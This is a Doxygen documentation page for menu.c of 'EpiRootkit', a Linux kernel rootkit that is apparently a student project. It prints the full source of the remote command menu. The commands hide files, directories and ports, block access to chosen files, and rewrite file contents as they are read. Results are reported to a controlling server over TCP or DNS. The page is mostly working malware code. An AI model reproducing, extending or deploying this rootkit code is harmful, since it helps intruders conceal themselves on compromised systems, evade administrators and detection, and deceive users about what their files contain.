EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
Functions | Variables
menu.c File Reference
#include "menu.h"
#include <linux/kernel.h>
#include <linux/slab.h>
#include <linux/string.h>
#include "alterate_api.h"
#include "epirootkit.h"
#include "forbid_api.h"
#include "hide_api.h"
Include dependency graph for menu.c:

Go to the source code of this file.

Functions

static int hide_dir_handler (char *args, enum Protocol protocol)
 
static int unhide_dir_handler (char *args, enum Protocol protocol)
 
static int forbid_file_handler (char *args, enum Protocol protocol)
 
static int unforbid_file_handler (char *args, enum Protocol protocol)
 
static int list_hidden_handler (char *args, enum Protocol protocol)
 
static int list_forbidden_handler (char *args, enum Protocol protocol)
 
static int list_alterate_handler (char *args, enum Protocol protocol)
 
static int unmodify_file_handler (char *args, enum Protocol protocol)
 
static int modify_file_handler (char *args, enum Protocol protocol)
 
static int hide_port_handler (char *args, enum Protocol protocol)
 
static int unhide_port_handler (char *args, enum Protocol protocol)
 
static int list_hidden_port_handler (char *args, enum Protocol protocol)
 
static int hooks_help (char *args, enum Protocol protocol)
 
int hooks_menu_handler (char *args, enum Protocol protocol)
 

Variables

static struct command hooks_commands []
 

Function Documentation

◆ forbid_file_handler()

static int forbid_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 122 of file menu.c.

122 {
123 if (!args)
124 return -EINVAL;
125 int r = forbid_file(args);
126 if (r == SUCCESS)
127 send_to_server(protocol, "Forbidden: %s\n", args);
128 else
129 send_to_server(protocol, "Error forbidding %s: %d\n", args, r);
130 return r;
131}
SUCCESS
#define SUCCESS
Definition config.h:5
forbid_file
int forbid_file(const char *path)
Definition forbid_api.c:24
send_to_server
int send_to_server(enum Protocol protocol, char *message,...)
Definition network.c:67

◆ hide_dir_handler()

static int hide_dir_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 100 of file menu.c.

100 {
101 if (!args)
102 return -EINVAL;
103 int r = hide_file(args);
104 if (r == SUCCESS)
105 send_to_server(protocol, "Hidden: %s\n", args);
106 else
107 send_to_server(protocol, "Error hiding %s: %d\n", args, r);
108 return r;
109}
hide_file
int hide_file(const char *path)
Definition hide_api.c:25

◆ hide_port_handler()

static int hide_port_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 67 of file menu.c.

67 {
68 if (!args)
69 return -EINVAL;
70 int r = hide_port(args);
71 if (r == SUCCESS)
72 send_to_server(protocol, "Hidden: %s\n", args);
73 else
74 send_to_server(protocol, "Error hiding %s: %d\n", args, r);
75 return r;
76};
hide_port
int hide_port(const char *port)
Definition hide_api.c:90

◆ hooks_help()

static int hooks_help ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 52 of file menu.c.

52 {
53 int i;
54 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
55 int off = snprintf(buf, STD_BUFFER_SIZE, "Available hooks commands:\n");
56 for (i = 0; hooks_commands[i].cmd_name != NULL; i++) {
57 off += snprintf(buf + off, STD_BUFFER_SIZE - off, " %-12s - %s\n",
58 hooks_commands[i].cmd_name, hooks_commands[i].cmd_desc);
59 if (off >= STD_BUFFER_SIZE)
60 break;
61 }
62 send_to_server(protocol, "%s", buf);
63 kfree(buf);
64 return 0;
65}
STD_BUFFER_SIZE
#define STD_BUFFER_SIZE
Definition config.h:68
hooks_commands
static struct command hooks_commands[]
Definition menu.c:27
command::cmd_name
char * cmd_name
Definition epirootkit.h:27

◆ hooks_menu_handler()

int hooks_menu_handler ( char *  args,
enum Protocol  protocol 
)

Handle the topā€level hooks command.

Parameters
argsEverything after the word "hooks", so "<subcmd> [<path>] [<other>...]"
protocolThe protocol used for communication (TCP or DNS).
Returns
0 on success, negative errno on failure.

Definition at line 289 of file menu.c.

289 {
290 char *cmd = strsep(&args, " \t");
291
292 int i;
293 if (!cmd)
294 return hooks_help(NULL, protocol);
295
296 for (i = 0; hooks_commands[i].cmd_name != NULL; i++) {
297 if (strncmp(cmd, hooks_commands[i].cmd_name,
298 hooks_commands[i].cmd_name_size)
299 == 0) {
300 if (hooks_commands[i].cmd_handler)
301 return hooks_commands[i].cmd_handler(args, protocol);
302 }
303 }
304
305 send_to_server(protocol, "Unknown hooks cmd '%s', try 'hooks help'\n", cmd);
306 return -EINVAL;
307}
hooks_help
static int hooks_help(char *args, enum Protocol protocol)
Definition menu.c:52
command::cmd_handler
int(* cmd_handler)(char *args, enum Protocol protocol)
Definition epirootkit.h:31

◆ list_alterate_handler()

static int list_alterate_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 166 of file menu.c.

166 {
167 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
168 int len = alterate_list_get(buf, STD_BUFFER_SIZE);
169 if (len <= 0)
170 send_to_server(protocol, "No alterate rules, sorry.\n");
171 else
172 send_to_server(protocol, "%s", buf);
173 kfree(buf);
174 return 0;
175}
alterate_list_get
int alterate_list_get(char *buf, size_t buf_size)
Definition alterate_api.c:96

◆ list_forbidden_handler()

static int list_forbidden_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 155 of file menu.c.

155 {
156 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
157 int len = forbid_list_get(buf, STD_BUFFER_SIZE);
158 if (len <= 0)
159 send_to_server(protocol, "No forbidden entries\n");
160 else
161 send_to_server(protocol, "%s", buf);
162 kfree(buf);
163 return 0;
164}
forbid_list_get
int forbid_list_get(char *buf, size_t buf_size)
Definition forbid_api.c:106

◆ list_hidden_handler()

static int list_hidden_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 144 of file menu.c.

144 {
145 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
146 int len = hide_list_get(buf, STD_BUFFER_SIZE);
147 if (len <= 0)
148 send_to_server(protocol, "No hidden entries\n");
149 else
150 send_to_server(protocol, "%s", buf);
151 kfree(buf);
152 return 0;
153}
hide_list_get
int hide_list_get(char *buf, size_t buf_size)
Definition hide_api.c:70

◆ list_hidden_port_handler()

static int list_hidden_port_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 89 of file menu.c.

89 {
90 char *buf = kmalloc(STD_BUFFER_SIZE, GFP_KERNEL);
91 int len = port_list_get(buf, STD_BUFFER_SIZE);
92 if (len <= 0)
93 send_to_server(protocol, "No hidden entries");
94 else
95 send_to_server(protocol, "%s", buf);
96 kfree(buf);
97 return len;
98};
port_list_get
int port_list_get(char *buf, size_t buf_size)
Definition hide_api.c:122

◆ modify_file_handler()

static int modify_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 177 of file menu.c.

177 {
178 char *path;
179 int ret = 0;
180 long hide_line = -1;
181 char *hide_substr = NULL;
182 char *replace_src = NULL;
183 char *replace_dst = NULL;
184
185 // Parsing
186 char *token;
187
188 // Get the first token
189 path = strsep(&args, " ");
190 if (!path || path[0] != '/') {
191 send_to_server(protocol, "Usage: hooks modify /full/path [hide_line=N] "
192 "[hide_substr=TXT] [replace=SRC:DST]\n");
193 return -EINVAL;
194 }
195
196 while (args && *args) {
197 token = strsep(&args, " ");
198 if (!token || *token == '\0')
199 continue;
200
201 if (strncmp(token, "hide_line=", 10) == 0) {
202 char *num = token + 10;
203
204 if (*num != '\0')
205 hide_line = simple_strtol(num, NULL, 10);
206 }
207
208 else if (strncmp(token, "hide_substr=", 12) == 0) {
209 char *txt = token + 12;
210 if (*txt == '\0') {
211 send_to_server(protocol, "Usage: hide_substr=TXT (TXT empty)\n");
212 ret = -EINVAL;
213 goto cleanup;
214 }
215 hide_substr = kstrdup(txt, GFP_KERNEL);
216 if (!hide_substr) {
217 ret = -ENOMEM;
218 goto cleanup;
219 }
220 }
221
222 else if (strncmp(token, "replace=", 8) == 0) {
223 char *arg = token + 8;
224 char *colon = strchr(arg, ':');
225
226 if (!colon || colon == arg || *(colon + 1) == '\0') {
227 send_to_server(
228 protocol,
229 "Usage: replace=SRC:DST (SRC and/or DST empty, without spaces)\n");
230 ret = -EINVAL;
231 goto cleanup;
232 }
233
234 *colon = '\0';
235 colon++;
236
237 replace_src = kstrdup(arg, GFP_KERNEL);
238 if (!replace_src) {
239 ret = -ENOMEM;
240 goto cleanup;
241 }
242
243 replace_dst = kstrdup(colon, GFP_KERNEL);
244 if (!replace_dst) {
245 ret = -ENOMEM;
246 goto cleanup;
247 }
248 }
249 else {
250 send_to_server(protocol, "Usage: hooks modify /full/path [hide_line=N] "
251 "[hide_substr=TXT] [replace=SRC:DST]\n");
252 ret = -EINVAL;
253 goto cleanup;
254 }
255 }
256
257 // DEBUG
258 DBG_MSG("modify_file_handler: path='%s', hide_line=%ld, hide_substr='%s', "
259 "replace_src='%s', replace_dst='%s'\n",
260 path, hide_line, hide_substr ? hide_substr : "NULL",
261 replace_src ? replace_src : "NULL",
262 replace_dst ? replace_dst : "NULL");
263
264 ret = alterate_add(path, hide_line, hide_substr, replace_src, replace_dst);
265 if (ret >= 0)
266 send_to_server(protocol, "Modified successfully: %s\n", path);
267 else
268 send_to_server(protocol, "Error modifying %s\n", path);
269
270cleanup:
271 kfree(hide_substr);
272 kfree(replace_src);
273 kfree(replace_dst);
274 return ret >= 0 ? 0 : ret;
275}
alterate_add
int alterate_add(const char *path, int hide_line, const char *hide_substr, const char *src, const char *dst)
Definition alterate_api.c:23
DBG_MSG
#define DBG_MSG(fmt, args...)
Definition config.h:15

◆ unforbid_file_handler()

static int unforbid_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 133 of file menu.c.

133 {
134 if (!args)
135 return -EINVAL;
136 int r = unforbid_file(args);
137 if (r == SUCCESS)
138 send_to_server(protocol, "Unforbidden: %s\n", args);
139 else
140 send_to_server(protocol, "Error unforbid %s: %d\n", args, r);
141 return r;
142}
unforbid_file
int unforbid_file(const char *path)
Definition forbid_api.c:51

◆ unhide_dir_handler()

static int unhide_dir_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 111 of file menu.c.

111 {
112 if (!args)
113 return -EINVAL;
114 int r = unhide_file(args);
115 if (r == SUCCESS)
116 send_to_server(protocol, "Unhidden: %s\n", args);
117 else
118 send_to_server(protocol, "Error unhide %s: %d\n", args, r);
119 return r;
120}
unhide_file
int unhide_file(const char *path)
Definition hide_api.c:52

◆ unhide_port_handler()

static int unhide_port_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 78 of file menu.c.

78 {
79 if (!args)
80 return -EINVAL;
81 int r = unhide_port(args);
82 if (r == SUCCESS)
83 send_to_server(protocol, "Unhidden: %s\n", args);
84 else
85 send_to_server(protocol, "Error unhiding %s: %d\n", args, r);
86 return r;
87};
unhide_port
int unhide_port(const char *port)
Definition hide_api.c:104

◆ unmodify_file_handler()

static int unmodify_file_handler ( char *  args,
enum Protocol  protocol 
)
static

Definition at line 277 of file menu.c.

277 {
278 if (!args)
279 return -EINVAL;
280 int r = alterate_remove(args);
281 if (r == SUCCESS)
282 send_to_server(protocol, "Removed: %s\n", args);
283 else
284 send_to_server(protocol, "Error while removing %s: %d\n", args, r);
285 return r;
286}
alterate_remove
int alterate_remove(const char *path)
Definition alterate_api.c:55

Variable Documentation

◆ hooks_commands

struct command hooks_commands[]
static
Initial value:
= {
{ "hide", 4, "hide a file or directory (getdents64 hook)", 43,
hide_dir_handler },
{ "unhide", 6, "unhide a file or directory", 32, unhide_dir_handler },
{ "list_hide", 9, "list hidden files/directories", 34, list_hidden_handler },
{ "add_port", 8, "add port to hide", 16, hide_port_handler },
{ "remove_port", 11, "remove hidden port", 18, unhide_port_handler },
{ "list_port", 9, "list hidden ports", 17, list_hidden_port_handler },
{ "forbid", 6, "forbid open/stat on a file (openat/stat/lstat... hook)", 55,
forbid_file_handler },
{ "unforbid", 8, "remove forbid on a file", 30, unforbid_file_handler },
{ "list_forbid", 11, "list forbidden files", 30, list_forbidden_handler },
{ "modify", 6,
"[CAREFUL] modify a file with hide/replace operation (read hook)", 64,
modify_file_handler },
{ "unmodify", 8, "unmodify a file", 30, unmodify_file_handler },
{ "list_modify", 11, "list alterate rules", 30, list_alterate_handler },
{ "help", 4, "display hooks help menu", 25, hooks_help },
{ NULL, 0, NULL, 0, NULL }
}
list_hidden_handler
static int list_hidden_handler(char *args, enum Protocol protocol)
Definition menu.c:144
list_hidden_port_handler
static int list_hidden_port_handler(char *args, enum Protocol protocol)
Definition menu.c:89
hide_dir_handler
static int hide_dir_handler(char *args, enum Protocol protocol)
Definition menu.c:100
forbid_file_handler
static int forbid_file_handler(char *args, enum Protocol protocol)
Definition menu.c:122
unforbid_file_handler
static int unforbid_file_handler(char *args, enum Protocol protocol)
Definition menu.c:133
unhide_port_handler
static int unhide_port_handler(char *args, enum Protocol protocol)
Definition menu.c:78
list_alterate_handler
static int list_alterate_handler(char *args, enum Protocol protocol)
Definition menu.c:166
modify_file_handler
static int modify_file_handler(char *args, enum Protocol protocol)
Definition menu.c:177
list_forbidden_handler
static int list_forbidden_handler(char *args, enum Protocol protocol)
Definition menu.c:155
unhide_dir_handler
static int unhide_dir_handler(char *args, enum Protocol protocol)
Definition menu.c:111
unmodify_file_handler
static int unmodify_file_handler(char *args, enum Protocol protocol)
Definition menu.c:277
hide_port_handler
static int hide_port_handler(char *args, enum Protocol protocol)
Definition menu.c:67

Definition at line 27 of file menu.c.

27 {
28 { "hide", 4, "hide a file or directory (getdents64 hook)", 43,
29 hide_dir_handler },
30 { "unhide", 6, "unhide a file or directory", 32, unhide_dir_handler },
31 { "list_hide", 9, "list hidden files/directories", 34, list_hidden_handler },
32
33 { "add_port", 8, "add port to hide", 16, hide_port_handler },
34 { "remove_port", 11, "remove hidden port", 18, unhide_port_handler },
35 { "list_port", 9, "list hidden ports", 17, list_hidden_port_handler },
36
37 { "forbid", 6, "forbid open/stat on a file (openat/stat/lstat... hook)", 55,
38 forbid_file_handler },
39 { "unforbid", 8, "remove forbid on a file", 30, unforbid_file_handler },
40 { "list_forbid", 11, "list forbidden files", 30, list_forbidden_handler },
41
42 { "modify", 6,
43 "[CAREFUL] modify a file with hide/replace operation (read hook)", 64,
44 modify_file_handler },
45 { "unmodify", 8, "unmodify a file", 30, unmodify_file_handler },
46 { "list_modify", 11, "list alterate rules", 30, list_alterate_handler },
47
48 { "help", 4, "display hooks help menu", 25, hooks_help },
49 { NULL, 0, NULL, 0, NULL }
50};